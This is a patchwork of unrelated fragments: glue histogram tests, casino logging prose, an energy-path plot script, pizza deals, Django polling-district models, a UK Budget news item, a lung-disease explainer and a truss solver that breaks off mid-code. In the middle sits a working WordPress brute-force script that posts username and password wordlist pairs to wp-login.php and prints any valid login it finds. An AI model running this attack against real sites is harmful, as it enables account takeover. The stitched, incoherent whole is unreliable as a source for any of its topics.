        assert self.draw_count() == ct0

    def test_update_data_processed_if_data_present(self):
        self.collect.append(self.data)
        self.client.add_layer(self.data)
        ct0 = self.draw_count()
        self.data.style.color = 'blue'
        assert self.draw_count() > ct0

    def test_add_subset_ignored_if_data_not_present(self):
        self.collect.append(self.data)
        ct0 = self.draw_count()
        sub = self.data.new_subset()
        assert not self.client.layer_present(sub)

    def test_add_subset_processed_if_data_present(self):
        self.collect.append(self.data)
        self.client.add_layer(self.data)
        sub = self.data.new_subset()
        assert self.client.layer_present(sub)

    def test_update_subset_ignored_if_not_present(self):
        self.collect.append(self.data)
        self.client.add_layer(self.data)
        sub = self.data.new_subset()
        self.client.remove_layer(sub)
        ct0 = self.draw_count()
        sub.style.color = 'blue'
        assert self.draw_count() == ct0

    def test_update_subset_processed_if_present(self):
        self.collect.append(self.data)
        self.client.add_layer(self.data)
        sub = self.data.new_subset()
        ct0 = self.draw_count()
        sub.style.color = 'blue'
        assert self.draw_count() > ct0

    def test_data_remove_message(self):
        self.collect.append(self.data)
        self.client.add_layer(self.data)
        self.collect.remove(self.data)
        assert not self.client.layer_present(self.data)

    def test_subset_remove_message(self):
        self.collect.append(self.data)
        self.client.add_layer(self.data)
        sub = self.data.new_subset()
        assert self.client.layer_present(sub)
        sub.delete()
        assert not self.client.layer_present(sub)
class TestHistogramLayerArtist(object):

    def setup_subset(self):
        ax = MagicMock()
        d = Data(x=[1, 2, 3])
        s = d.new_subset()
        s.subset_state = d.id['x'] > 1
        self.artist = HistogramLayerArtist(s, ax)

    def setup_hist_calc_counter(self):
        self.setup_subset()
        m = MagicMock()
        self.artist._calculate_histogram = m
        return m

    def setup_hist_scale_counter(self):
        self.setup_subset()
        m = MagicMock()
        self.artist._scale_histogram = m
        self.artist._calculate_histogram = MagicMock()
        return m

    def test_calculate_histogram_efficient(self):
        ct = self.setup_hist_calc_counter()
        self.artist.update()
        assert ct.call_count == 1
        self.artist.update()
        assert ct.call_count == 1

    def test_recalc_on_state_changes(self):
        ct = self.setup_hist_calc_counter()
        assert ct.call_count == 0
        self.artist.update()
        assert ct.call_count == 1

        # lo
        self.artist.lo -= 1
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 2

        # hi
        self.artist.hi -= 1
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 3

        # nbins
        self.artist.nbins += 1
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 4

        # xlog
        self.artist.xlog ^= True
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 5

        # ylog -- no call
        self.artist.ylog ^= True
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 5

        # cumulative -- no call
        self.artist.cumulative ^= True
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 5

        # normed -- no call
        self.artist.normed ^= True
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 5

        # subset style -- no call
        self.artist.layer.style.color = '#00ff00'
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 5

        # subset state
        self.artist.layer.subset_state = self.artist.layer.data.id['x'] > 10
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 6

    def test_rescale_on_state_changes(self):
        ct = self.setup_hist_scale_counter()
        assert ct.call_count == 0
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 1

        # lo
        self.artist.lo -= 1
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 2

        # hi
        self.artist.hi -= 1
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 3

        # nbins
        self.artist.nbins += 1
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 4

        # xlog
        self.artist.xlog ^= True
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 5

        # ylog
        self.artist.ylog ^= True
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 6

        # cumulative
        self.artist.cumulative ^= True
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 7

        # normed
        self.artist.normed ^= True
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 8

        # subset state
        self.artist.layer.subset_state = self.artist.layer.data.id['x'] > 10
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 9

        # subset style -- no call
        self.artist.layer.style.color = '#00ff00'
        self.artist.update()
        self.artist.update()
        assert ct.call_count == 9
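These tests follow pytest's class-based conventions. Assuming this excerpt lives in a file named something like test_histogram_client.py (a hypothetical name) with the glue package and mock installed, the whole set can be collected and run with:

    pytest test_histogram_client.py -v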
The gaming log records the outcomes on each of the pay lines and any payouts won; this is done at every spin. A comparable record is kept for every game, taking into account the particular requirements of that game.
The financial transaction log records every deposit and withdrawal by the player and how each was carried out. It likewise holds the transactions for plays and for the paying out of winnings. In both the gaming log and the financial transaction log, the date and time are also recorded. This transaction logging strengthens the confidence of players in two ways. It demonstrates that the online casino is completely transparent in how it handles a player's data. In cases of doubt, the player knows he can look closely at the transaction history to see exactly what happened. If the online casino maintains, for instance, that the wagering requirements had not been satisfied by the player, he can check this himself against the transaction history. Furthermore, in the unlikely event that the dispute should end up in court, the player knows that the examining judge will have access to complete and accurate audit log records.
The second advantage of transaction logging is that it supports the player in his decision making. Take the example of a player who finds himself in a particular situation in a blackjack game. He remembers being in a similar situation a few weeks earlier, but cannot quite recall what he did then. With the help of the transaction history he can find out what he did and what the result was, which gives him a better basis for making a fresh decision. Exactly how transaction logging is implemented varies from software vendor to software vendor. At the bottom of the table are online casinos where the player must send an email to the casino to ask for his transaction history.
At the top are those where the player can check what he needs directly, and afterwards keep on playing as though nothing had happened.
import numpy as np
import matplotlib.pyplot as plt
from sys import argv
from scipy.signal import argrelextrema
# The two imports below are only needed by the commented-out interpolation
# and tick-formatting blocks inside main().
from scipy.interpolate import interp1d
from matplotlib.ticker import FormatStrFormatter


def main(energy_path, fName, interpolate=False):
    # Trimming the path to its true end minima is disabled by default.
    usetrueminimas = False
    # Indices of the local minima and maxima along the energy path (currently
    # only used by the commented-out annotation code below).
    minimums = argrelextrema(energy_path, np.less_equal)[0]
    #print(energy_path[minimums])
    maxima = argrelextrema(energy_path, np.greater)[0]
    #print(energy_path[maxima])
    # Shift the curve so the lowest energy sits at zero.
    energy_path = energy_path - np.min(energy_path)
    #if(usetrueminimas):
    #    energy_path = energy_path[minimums[0]:minimums[-1]]
    fig, ax = plt.subplots()
    #ax.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
    #ax.set_xticklabels([])  # disable ticks
    #ax.set_aspect('auto')
    M = energy_path.shape[0]
    #plt.yticks(np.arange(min(energy_path), max(energy_path) + 0.4, 0.1))
    plt.ylim([np.min(energy_path) - .06, np.max(energy_path) + .4])
    plt.ylabel('eV')
    plt.xlim([0 - 5, M + 7])
    x = range(0, M)
    y = energy_path
    plt.plot(energy_path, linewidth=3)
    # Optional cubic interpolation of the path (disabled):
    #f2 = interp1d(x, y, kind='cubic')
    #xnew = np.linspace(0, M - 1, num=1000, endpoint=True)
    #if(interpolate):
    #    plt.plot(xnew, f2(xnew), linewidth=3)
    #else:
    #    plt.plot(x, y, linewidth=3)
    # Optional Roman-numeral labels at the minima (disabled):
    #rn = ['I', 'II', 'III', 'IV', 'V', 'VI', 'VII']
    #if(usetrueminimas):
    #    minimums = (minimums - minimums[0])  # shift the minima indices to match the trimmed path
    #    minimums[-1] = minimums[-1] - 1
    #ax.plot([minimums], [energy_path[minimums]], 'o', color='green')
    #for i in range(len(minimums)):
    #    ax.annotate(rn[i], xy=(minimums[i], energy_path[minimums[i]]),
    #                xytext=(minimums[i] - 2, energy_path[minimums[i]] - 0.04))
    plt.savefig(f"{fName}.eps", bbox_inches='tight', dpi=300)


if __name__ == "__main__":
    try:
        print(argv[0], argv[1], argv[2])
        energy_path = np.loadtxt(argv[1])
        main(energy_path, argv[2])
    except (IndexError, OSError):
        print("ERROR: You didn't provide the input file for the program", argv[0])
Deals For "National Pizza Day"
Papa John’s - Get 25% off all regular-price pizzas.
Pilot Flying J - Download the myPilot app to get a free slice.
Pizza Hut - Get two medium pizzas for $6.99 each, and Hut Rewards members save 30% on menu-priced pizzas.
from django.db import models

from core.models import BaseEMSModel, Organization


class GeoDistrict(BaseEMSModel):
    """EML 150."""
    # TODO: At some point, consider using django-mptt.
    # TODO: Should we have a separate model for the district type, where
    # things defining the type of district can be set (e.g. polling places
    # are at this level)?
    organization = models.ForeignKey(Organization)
    name = models.CharField(max_length=100, default='Global')
    LEVEL = (
        ('Global', 'Global'),
        ('Continent', 'Continent'),
        ('Nation', 'Nation'),
    )
    level = models.CharField(max_length=12, blank=True, null=True, choices=LEVEL, default='Global')
    short_name = models.CharField(max_length=20, blank=True)
    description = models.CharField(max_length=250, blank=True,
                                   default='The global district all voters and elections are assigned to '
                                           'by default. Elections can take place anywhere in the world.')
    parent = models.ForeignKey('GeoDistrict', null=True, blank=True, default=None)

    def __str__(self):
        return self.name


class PollingLocation(BaseEMSModel):
    name = models.CharField(max_length=100, default='Polling Place')
    address = models.CharField(max_length=100, blank=True, null=True)
    is_active = models.BooleanField(default=True)
    geo_district = models.ForeignKey(GeoDistrict, null=True, blank=True, default=None)

    def __str__(self):
        return self.name
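For orientation, here is a quick hypothetical ORM session using these models; it assumes a configured Django project with at least one Organization row, and every name and value below is invented for illustration:

# Hypothetical usage sketch; not part of the models module.
org = Organization.objects.first()
world = GeoDistrict.objects.create(organization=org, name='Global', level='Global')
nation = GeoDistrict.objects.create(organization=org, name='Canada',
                                    level='Nation', parent=world)
PollingLocation.objects.create(name='City Hall', address='100 Queen St W',
                               geo_district=nation)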
DRINKERS have been given a gift in today’s Budget as the Chancellor Philip Hammond announced duty will be frozen on beer, wine and spirits.
Meanwhile, an average pack of fags, such as Lambert & Butler, will go up to £9.30.
The changes take effect from 6pm tonight.
That is because the Chancellor announced tobacco duty will rise at two per cent above inflation.
Hand-rolling tobacco will go up by a further one per cent on top of that.
The tobacco industry last week voiced concerns that the Chancellor would use the Budget to increase the amount of tax raised from sales of tobacco.
The Chancellor pushed up a pack of 20 by 35p in the last budget and the industry has also been hit by other hikes.
As a result, the average cost of a premium pack of 20 cigarettes now stands at £9.91 in the UK, according to the Tobacco Manufacturers’ Association (TMA).
The TMA now estimates the Government could push the price of a pack of 20 above £10.
In March, the Chancellor increased alcohol duty in line with inflation, a rise of 3.9 per cent.
That hike, the first in five years, has put increased strain on local pubs, with wine up by 8p, vodka up by 40p and gin up by 43p.
Britain’s alcohol is among the most heavily taxed in the world, with the third-highest duty rate for wine and the fourth-highest for spirits.
#!/usr/bin/env python3
# Module-related comments are only applied in this script.

import requests  # Used to send requests to, and read responses from, the local server.
import sys  # Used for writing formatted text to the terminal.
from colorama import Fore, Style  # Used for formatting text (colour, style, etc.).
import time
import os  # Used to clear the screen.


def main():
    os.system("clear")  # Clear the screen.
    print(Fore.CYAN + "##########################################################// \\\################################################################")
    print(Fore.CYAN + "#########################################################// $ $ WeLCoMe $ $ \\\###############################################################")
    time.sleep(0.5)
    print(Fore.CYAN + '''########################################################// \\\##############################################################''')
    time.sleep(0.5)
    print(Fore.CYAN + '''#######################################################// \\\#############################################################''')
    time.sleep(0.5)
    print(Fore.CYAN + "######################################################// \\\############################################################")
    time.sleep(0.5)
    print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
    time.sleep(0.5)
    print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
    time.sleep(0.5)
    print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
    time.sleep(0.5)
    print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
    time.sleep(0.5)
    print(Fore.CYAN + "\t\t\t\t\t\t#// W_PRESS.PY \\\#")
    time.sleep(0.5)
    print(Fore.CYAN + "\t\t\t\t\t\t#//''''''''''''''''''''''''''''''''''\\\#")
    time.sleep(0.5)
    print(Fore.CYAN + "\t\t\t\t\t\t#//________Written By: Satyajeet________\\\#")
    time.sleep(0.5)
    print(Fore.RED + '\n\n\t\t' + Fore.YELLOW + 'Watch: https://youtu.be/sh2klOT3uws ||' + Fore.RED + '|| Download: https://github.com/satyajeet76626/WordPress_BrutForce.git')
    time.sleep(0.3)
    print(Fore.RED + "\n\n\t\t\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> WaRnInG..!!! : <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
    time.sleep(0.3)
    print(Fore.RED + '\n\t\t\t\t"::::::::If you are not able to RUN this script, Please! Read README file::::::::"')
    print(Fore.RED + '\n\t\t\t\t:::::::::::::::::::::::::::' + Fore.YELLOW + '"OR Run installer.py"' + Fore.RED + ':::::::::::::::::::::::::::::::')

    # Target login URL.
    url = 'http://localhost/wp-login.php'
    print(Fore.CYAN + "\n\nNOTE : " + Fore.WHITE + "Put your 'Users_list' and 'Password_list' file in the same directory as the 'w_press.py' script.")
    print(Fore.YELLOW + "\n\nW_PrEsS >> ", end=' ')

    # Read the user-list and password-list file names from the user.
    userslist_file = input(Fore.GREEN + "Enter Users_list fileName: ")
    print(Fore.YELLOW + "\n\nW_PrEsS >> ", end=' ')
    passwordslist_file = input(Fore.GREEN + "Enter Password_list fileName: ")

    # Read the usernames and passwords from the files, stripping the trailing
    # newline that readlines() leaves on every entry.
    users = [u.strip() for u in open(userslist_file, 'r').readlines()]
    passwords = [p.strip() for p in open(passwordslist_file, 'r').readlines()]
    print(Fore.YELLOW + "\n\t\t\t______________Thanks For Using..!! ('Sit_back && Have Your Coffee!')________________")

    # Total number of username/password combinations to try.
    users_len = len(users)
    pass_len = len(passwords)
    total = users_len * pass_len
    print(Fore.CYAN + "\n\n\rTotAl Passw0rD tO TrY: ", total)

    c = 0
    for user in users:
        for passwd in passwords:
            # Send the credentials to the WordPress login page on the local
            # (apache2) server and read back the response body.
            http = requests.post(url, data={'log': user, 'pwd': passwd, 'wp-submit': 'Log In'})
            datas = http.content
            # A successful login lands on a page containing the word 'Dashboard'.
            if 'Dashboard' in str(datas):
                c += 1
                complete = (c * 100) // total
                # Format the output for readability.
                sys.stdout.write(Fore.YELLOW + "\n\n\r[+] FouNd UserName: " + Fore.GREEN + "'{}'".format(user))
                sys.stdout.write(Fore.YELLOW + "\n\n\r[+] FouNd PassW0rd: " + Fore.GREEN + "'{}'".format(passwd))
                print(Fore.BLUE + "\n\nPasswords checked: ", end=" ")
                print(Fore.GREEN + "{}".format(c))
                print(Fore.MAGENTA + "\t\t\t\t\t" + Fore.GREEN + " {}%".format(complete), end=' ')
                print(Fore.MAGENTA + "CompLeTed.....\n\n")
                # Stop searching once a valid pair is found.
                return
            else:
                c += 1
                complete = (c * 100) // total
                sys.stdout.write(Fore.RED + "\r\t\t\t\t\t\t[-] tRyInG....." + Fore.GREEN + "\t{}%".format(complete))
                sys.stdout.flush()

    # Reached only if no combination matched.
    print(Fore.CYAN + "\n\n\t\t\t\t\t\tSoRRy!!, PaSSwOrD NoT FoUnD.!\n")

# To reset the formatted text colour and styles, print(Style.RESET_ALL).
# Uncomment the lines below to display the program execution time.
# t0 = time.time()
# main()
# t1 = time.time()
# print("ExecuTion Time: ", t1 - t0)


if __name__ == '__main__':
    main()
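A typical session (assuming a WordPress install answering at http://localhost/wp-login.php, and wordlists named users.txt and passwords.txt, both hypothetical names, placed next to the script):

    python3 w_press.py
    W_PrEsS >> Enter Users_list fileName: users.txt
    W_PrEsS >> Enter Password_list fileName: passwords.txt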
Pulmonary fibrosis is an uncommon lung disease wherein the lung tissue becomes scarred and thick. These scars are called fibrosis. Often the cause is unknown and hence, it is called idiopathic pulmonary fibrosis (IPF). It is a serious disease affecting the middle-aged or older individuals. It can result in respiratory failure, pulmonary hypertension, heart failure, pulmonary embolism (blood clot in the arteries supplying the lung), and lung cancer.
The cause of idiopathic pulmonary fibrosis is unknown, but exposure to certain environmental factors and pollutants has been shown to increase the risk of pulmonary fibrosis. Factors such as cigarette smoking and exposure to metal dust, wood dust, stone dust, silica, hay dust, mould spores or agricultural products predispose an individual to developing pulmonary fibrosis. Men are affected more often than women, and the disease is more frequent in people over 50 years of age.
About 20% people with IPF are known to have another family member diagnosed with an interstitial lung disease. If more than one member is suffering from this condition in a family, then it is called familial pulmonary fibrosis.
About 75% of patients with IPF also have gastroesophageal reflux disease (GERD).
A multidisciplinary approach by the pulmonologist, radiologist, and pathologist is needed to diagnose idiopathic pulmonary fibrosis since the symptoms are often similar to those of asthma, chronic obstructive pulmonary disease (COPD), and congestive heart failure. Your doctor will diagnose it based on your medical history, physical exam, and test results like X-rays, high resolution computed tomography (CT), lung function tests, pulse oximetry, arterial blood gas test, skin test for tuberculosis, exercise testing, and lung biopsy.
Your doctor may treat the condition with medicines, oxygen therapy, pulmonary rehabilitation, and lung transplant. Some additional medicines are prescribed to treat breathlessness and cough. Antacid therapy for gastroesophageal reflux disease (GERD) is also given.
Medicines available for idiopathic pulmonary fibrosis are listed below. Please note that you should not take any medicine without consulting a doctor; doing so can cause serious problems.
#
# -*- coding: utf-8 -*-
#
# Python-Based Truss Solver
# =============================================================
#
# Author: Robert Grandin
#
# Date: Fall 2007 (Creation of original Fortran solution in AerE 361)
# October 2011 (Python implementation)
# November 2014 (Clean-up and graphical/VTK output)
#
#
# PURPOSE:
# This code solves a truss for the internal load, strain, and stress of each member.
# Being a truss, all members are assumed to be two-force members and no bending
# moments are considered. Both 2-dimensional and 3-dimensional trusses can be
# solved with this code.
#
#
# INSTRUCTIONS & NOTES:
# - Dictionaries are used to define the entity properties. Names for the properties
# should be self-explanatory. Some notes:
# - '_flag' entries identify either displacement ('d') or force ('f') boundary
# conditions (BCs). Applied forces require force BCs to be specified.
# Pin/roller locations require displacement BCs. Free-to-move nodes will
# typically have 0-force BCs.
# - '_bcval' entries specify the BC value for the corresponding flag.
# - If solving a 2-dimensional problem, constrain node motion in the 3rd
# dimension to be 0. Allowing nodal motion in the 3rd dimension (by setting
# the constraint to 0-force) will produce a matrix with non-empty null-space.
# Displacements in the third dimension will reside in this null-space.
# - Input data can be saved in a python data file. Create a module for your
# problem and define a function which returns 'nodes, members'.
# - Examples shown below for 2D, 3D, and file-based input. See data file
# 'em514_problem08.py' for an example of how to write an input file.
#
#
# HOMEWORK DISCLAIMER:
# This tool is intended to be a learning aid. Feel free to use it to check your
# work, but do not use it in place of learning how to find the solution yourself.
#
# When using this tool for statics problems, the member loads calculated by this
# tool will not match the correct answer for the statics problem. This is due
# to the fact that this tool considers displacements whereas displacements are
# not considered in a statics problem (but displacements are considered in
# mechanics problems). Even though the numerical results will not match when
# checking statics results, the discrepancy should be small enough to enable
# you to determine if your statics result is correct.
#
#
#
# ========================
#
# 2D SAMPLE INPUT
#
#nodes = [{'x': 0.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': -800.0e0, 'zflag': 'd', 'zbcval': 0.0e0}]
#nodes.append({'x': 36.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 72.0e0, 'y': 18.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 36.0e0, 'y': 18.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': -1000.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#
#members = [{'start': 0, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6}]
#members.append({'start': 1, 'end': 2, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 1, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 2, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 0, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#
#
#
# ========================
#
# 3D SAMPLE INPUT
#
#nodes = [{'x': 0.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0}]
#nodes.append({'x': 20.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': 0.0e0, 'zflag': 'f', 'zbcval': 1000.0e0})
#nodes.append({'x': 0.0e0, 'y': 25.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 0.0e0, 'y': 0.0e0, 'z': 10.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#
#members = [{'start': 0, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6}]
#members.append({'start': 1, 'end': 2, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 3, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#
#
#
# ========================
#
# DATA FILE SAMPLE INPUT
#
import em274_assess5_2017 # Name of python file, no extension
reload(em274_assess5_2017) # Force reload to catch any updates/revisions
nodes, members = em274_assess5_2017.DefineInputs() # Call input-definition function
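#
# For reference, a minimal input module consistent with the import above might
# look like the sketch below. (The function name 'DefineInputs' matches the
# call; the node and member values here are illustrative only and are NOT the
# contents of em274_assess5_2017.py.)
#
#   def DefineInputs():
#       nodes = [{'x': 0.0e0, 'y': 0.0e0, 'z': 0.0e0,
#                 'xflag': 'd', 'xbcval': 0.0e0,
#                 'yflag': 'd', 'ybcval': 0.0e0,
#                 'zflag': 'd', 'zbcval': 0.0e0}]
#       nodes.append({'x': 10.0e0, 'y': 0.0e0, 'z': 0.0e0,
#                     'xflag': 'f', 'xbcval': 0.0e0,
#                     'yflag': 'f', 'ybcval': -500.0e0,
#                     'zflag': 'd', 'zbcval': 0.0e0})
#       members = [{'start': 0, 'end': 1, 'E': 30.0e6, 'A': 1.0e0,
#                   'sigma_yield': 36.0e3, 'sigma_ult': 66.0e3}]
#       return nodes, members
#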
# Set scale factor to make display more-easily understood.
displayScaleFactor = 100.0
# =============================================================================================
#
#
#
# NO EDITS REQUIRED BELOW HERE
#
#
#
# =============================================================================================
# ========================
#
# IMPORT PYTHON MODULES REQUIRED FOR SOLUTION
#
import numpy # General linear algebra capability
import scipy # Advanced routines for evaluating solution quality
import matplotlib.pyplot as plt # 2D plotting
# ========================
#
# ECHO INPUT VALUES TO SCREEN
#
# Calculate Member Properties
nnodes = len(nodes)
nmem = len(members)
# Write Input Information
print(' ')
print('==============================================')
print(' ')
print(' INPUT INFORMATION')
print(' ')
print('==============================================')
print(' ')
print('Pin Input Information')
print('--------------------------------------')
for i in range(nnodes):
    print('Node % 3d' % (i))
    print(' Position: ( % 12.3g, % 12.3g, % 12.3g )' % (nodes[i]['x'], nodes[i]['y'], nodes[i]['z']))
    print(' BC Type: ( %*.*s, %*.*s, %*.*s )' % (12, 12, nodes[i]['xflag'], 12, 12, nodes[i]['yflag'], 12, 12, nodes[i]['zflag']))
    print(' BC Value: ( % 12.3g, % 12.3g, % 12.3g )' % (nodes[i]['xbcval'], nodes[i]['ybcval'], nodes[i]['zbcval']))
    print(' ')
print(' ')
print(' ')
print(' ')
print('Member Input Information')
print('--------------------------------------')
for i in range(nmem):
    print('Member % 3d' % (i))
    print(' Start, end nodes: ( % 3d, % 3d )' % (members[i]['start'], members[i]['end']))
    print(' Young\'s Modulus: % 12.3g' % (members[i]['E']))
    print(' Cross-sectional Area: % 12.3g' % (members[i]['A']))
    print(' Yield Strength: % 12.3g' % (members[i]['sigma_yield']))
    print(' Ultimate Strength: % 12.3g' % (members[i]['sigma_ult']))
    print(' ')
print(' ')
print(' ')
print(' ')
# ========================
#
# SETUP MATRIX EQUATION AND SOLVE
#
# Calculate member properties
for i in range(nmem):
    dx = nodes[members[i]['end']]['x'] - nodes[members[i]['start']]['x']
    dy = nodes[members[i]['end']]['y'] - nodes[members[i]['start']]['y']
    dz = nodes[members[i]['end']]['z'] - nodes[members[i]['start']]['z']
    members[i]['L'] = numpy.sqrt(dx*dx + dy*dy + dz*dz)
    members[i]['costheta_x'] = dx/members[i]['L']
    members[i]['costheta_y'] = dy/members[i]['L']
    members[i]['costheta_z'] = dz/members[i]['L']
# Build stiffness matrix
stiffness = numpy.zeros((3*nnodes,3*nnodes), dtype='float64')
G = numpy.zeros((6,6), dtype='float64')  # (allocated but not used below)
for i in range(nmem):
    tbm2 = 3*members[i]['start'] + 2
    tbm1 = 3*members[i]['start'] + 1
    tb = 3*members[i]['start']
    tem2 = 3*members[i]['end'] + 2
    tem1 = 3*members[i]['end'] + 1
    te = 3*members[i]['end']
    k = members[i]['A']*members[i]['E']/members[i]['L']
    stiffness[tb][tb] += k*members[i]['costheta_x']*members[i]['costheta_x']
    stiffness[tb][tbm1] += k*members[i]['costheta_x']*members[i]['costheta_y']
    stiffness[tb][tbm2] += k*members[i]['costheta_x']*members[i]['costheta_z']
    stiffness[tb][te] += -k*members[i]['costheta_x']*members[i]['costheta_x']
    stiffness[tb][tem1] += -k*members[i]['costheta_x']*members[i]['costheta_y']
    stiffness[tb][tem2] += -k*members[i]['costheta_x']*members[i]['costheta_z']
    stiffness[tbm1][tb] += k*members[i]['costheta_y']*members[i]['costheta_x']
    stiffness[tbm1][tbm1] += k*members[i]['costheta_y']*members[i]['costheta_y']
    stiffness[tbm1][tbm2] += k*members[i]['costheta_y']*members[i]['costheta_z']
    stiffness[tbm1][te] += -k*members[i]['costheta_y']*members[i]['costheta_x']
    stiffness[tbm1][tem1] += -k*members[i]['costheta_y']*members[i]['costheta_y']
    stiffness[tbm1][tem2] += -k*members[i]['costheta_y']*members[i]['costheta_z']
    stiffness[tbm2][tb] += k*members[i]['costheta_z']*members[i]['costheta_x']
    stiffness[tbm2][tbm1] += k*members[i]['costheta_z']*members[i]['costheta_y']
    stiffness[tbm2][tbm2] += k*members[i]['costheta_z']*members[i]['costheta_z']
    stiffness[tbm2][te] += -k*members[i]['costheta_z']*members[i]['costheta_x']
    stiffness[tbm2][tem1] += -k*members[i]['costheta_z']*members[i]['costheta_y']
    stiffness[tbm2][tem2] += -k*members[i]['costheta_z']*members[i]['costheta_z']
    stiffness[te][tb] += -k*members[i]['costheta_x']*members[i]['costheta_x']
    stiffness[te][tbm1] += -k*members[i]['costheta_x']*members[i]['costheta_y']
    stiffness[te][tbm2] += -k*members[i]['costheta_x']*members[i]['costheta_z']
    stiffness[te][te] += k*members[i]['costheta_x']*members[i]['costheta_x']
    stiffness[te][tem1] += k*members[i]['costheta_x']*members[i]['costheta_y']
    stiffness[te][tem2] += k*members[i]['costheta_x']*members[i]['costheta_z']
    stiffness[tem1][tb] += -k*members[i]['costheta_y']*members[i]['costheta_x']
    stiffness[tem1][tbm1] += -k*members[i]['costheta_y']*members[i]['costheta_y']
    stiffness[tem1][tbm2] += -k*members[i]['costheta_y']*members[i]['costheta_z']
    stiffness[tem1][te] += k*members[i]['costheta_y']*members[i]['costheta_x']
    stiffness[tem1][tem1] += k*members[i]['costheta_y']*members[i]['costheta_y']
    stiffness[tem1][tem2] += k*members[i]['costheta_y']*members[i]['costheta_z']
    stiffness[tem2][tb] += -k*members[i]['costheta_z']*members[i]['costheta_x']
    stiffness[tem2][tbm1] += -k*members[i]['costheta_z']*members[i]['costheta_y']
    stiffness[tem2][tbm2] += -k*members[i]['costheta_z']*members[i]['costheta_z']
    stiffness[tem2][te] += k*members[i]['costheta_z']*members[i]['costheta_x']
    stiffness[tem2][tem1] += k*members[i]['costheta_z']*members[i]['costheta_y']
    stiffness[tem2][tem2] += k*members[i]['costheta_z']*members[i]['costheta_z']
# Calculate average of main diagonal for numerical stability
average = 0.0e0
for i in range(3*nnodes):
    average += stiffness[i][i]
average /= float(3*nnodes)
# Create and fill arrays to be used when solving matrix equation
A = numpy.zeros(stiffness.shape, dtype='float64')
b = numpy.zeros((3*nnodes,1), dtype='float64')
for i in range(nnodes):
    icol = 3*i
    if(nodes[i]['xflag'] == 'd'):
        for j in range(3*nnodes):
            b[j] -= stiffness[j][icol]*nodes[i]['xbcval']
        A[icol][icol] = -average
    if(nodes[i]['xflag'] == 'f'):
        b[icol] += nodes[i]['xbcval']
        for j in range(3*nnodes):
            A[j][icol] = stiffness[j][icol]
    icol = 3*i + 1
    if(nodes[i]['yflag'] == 'd'):
        for j in range(3*nnodes):
            b[j] -= stiffness[j][icol]*nodes[i]['ybcval']
        A[icol][icol] = -average
    if(nodes[i]['yflag'] == 'f'):
        b[icol] += nodes[i]['ybcval']
        for j in range(3*nnodes):
            A[j][icol] = stiffness[j][icol]
    icol = 3*i + 2
    if(nodes[i]['zflag'] == 'd'):
        for j in range(3*nnodes):
            b[j] -= stiffness[j][icol]*nodes[i]['zbcval']
        A[icol][icol] = -average
    if(nodes[i]['zflag'] == 'f'):
        b[icol] += nodes[i]['zbcval']
        for j in range(3*nnodes):
            A[j][icol] = stiffness[j][icol]
# Solve the system
x,res,rank,singularvals = numpy.linalg.lstsq(A,b)
# Calculate nodal results
for i in range(nnodes):
    if(nodes[i]['xflag'] == 'f'):
        nodes[i]['xdisp'] = x[3*i+0][0]
